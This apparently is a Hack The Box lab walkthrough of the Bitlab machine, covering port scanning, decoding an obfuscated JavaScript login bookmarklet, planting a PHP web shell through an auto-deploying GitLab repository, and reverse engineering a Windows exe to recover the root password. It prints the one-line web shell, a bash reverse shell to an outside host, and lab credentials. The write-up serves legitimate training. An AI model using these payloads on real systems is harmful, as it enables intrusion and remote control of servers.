20. Hack The Box. Level Medium: Bitlab walkthrough. Weak JS obfuscation, GIT and reverse engineering Windows applications

24 December 2024 6 minutes Author: Lady Liberty

Hack The Box is a cybersecurity platform that allows you to test your skills on real-world challenges. In this detailed analysis, we will focus on the Bitlab machine solution, which combines weak JavaScript obfuscation, GitLab, and Windows application reverse engineering.

Bitlab on Hack The Box: JS, GitLab and reverse Windows

This article covers key aspects: easy JavaScript obfuscation, loading a backdoor via a Git repository, and debugging a 32-bit application.

A VPN is used to connect to the lab. It is not recommended to connect from a work computer or device containing sensitive data, as the private network may include participants with advanced cybersecurity knowledge.

Intelligence

Port scanning

This machine has an IP address of 10.10.10.114, which we add to /etc/hosts

10.10.10.114 bitlab.htb

First, a scan of open ports is performed. Since a full scan of all ports with nmap takes a long time, the first step is to use masscan. This tool allows you to quickly scan all TCP and UDP ports from the tun0 interface at a rate of 1000 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.114 --rate=1000

Next, we need to collect more information about the ports we know.

nmap -A bitlab.htb -p22,80

According to the nmap report, SSH and a web server are active on the host. A robots.txt file was found on the web server. After analyzing the directories specified in this file, an active GitLab and an unindexed help directory were found.

Going to the bookmarks page, we have several links.

JS

All links lead to different product pages, except for the last one, which contains not an address, but JavaScript code.

And this code is obfuscated.

javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()

To get more readable code, you can use the following site.

After slightly modifying the code, we will get the following instructions executed.

document.getElementById("user_login").value = "clave";
document.getElementById("user_password").value = "11des0081x";

Git

With these details, we log in to gitlab. There we find two profiles.

You can also find one project that implements a database connection. The code contains all the necessary data to establish the connection.

After checking the Profile, we don’t find anything interesting.

Deployer only has PHP code.

From the code analysis, it is clear that when a file is placed in a profile, it is automatically deployed on the server.

Entry Рoint

It is necessary to deploy a PHP backdoor that, for example, can accept and execute commands.

<?php $cmd = $_REQUEST['cmd']; system($cmd); die; ?>

Open Profile and create a new file.

And after adding, the file will appear in the repository.

Now we test the backdoor.

We will get a full shell.

bash -i >& /dev/tcp/10.10.15.150/4321 0>&1

We see a return connection to our host.

USER

After gaining access to the host, it is necessary to verify the previously obtained data, in particular the credentials for connecting to the database. The PHP interpreter is opened in interactive mode. The found code is used to view the available data. The password, encrypted in Base64 format, is decoded for further use.

The result was a password that could be used to connect via SSH, but the attempt was unsuccessful because the Base64 text itself is the password.

ROOT

During a scan of the machine, an exe file was discovered in the user’s home directory.

scp [email protected]:~/RemoteConnection.exe .

Next, open the file in IDA Pro. Scrolling through the main function, you can find the comparison of a variable with the username and the creation of a process with putty – a program for network connections.

It can be assumed that the connection is made using the authentication data that needs to be found. The connection data is passed to putty as a parameter, i.e. the v3 variable.

The finished string can be viewed during debugging, but in IDA the 32-bit file looks awkward. Step-by-step debugging shows that this happens after the call to GetUserNameW. Then the steps are performed as follows:

A breakpoint is set at the fragment where the name is compared.

Now we set a breakpoint (BP) before loading the parameters for the GetUserNameW function.

Let’s run the program in the debugger. Debugging will stop before calling the desired function.

Now the code is patched. Instead of loading parameters and calling a function, you need to insert a NOP instruction. This is done using the Keypatch plugin.

Now the code looks like this.

We continue debugging the program to reach the point of name comparison. At this stage, the address of the parameter string will already be loaded into the EAX register for further transfer as a parameter to the ShellExecuteW function.

Now click on the arrow (jump in disassembly) next to the EAX register. This allows you to jump to the address stored in EAX in the main IDA window.

At this address is the parameter string. As you can see, it symbolically represents the correct text “-ssh root…”, but each character takes up 2 bytes. For convenient assembly of the string, use the Alt+A key combination.

And in this window we select Unicode C-Style (16 bit). After that we observe the correctly assembled string.

This line contains the root user password. We use it to connect via SSH and get a token.

Висновок

Analysis of the Bitlab machine showed how a token can be obtained through scanning, exploiting GitLab vulnerabilities, debugging an exe file, and connecting via SSH. This is an example of effective cybersecurity problem solving.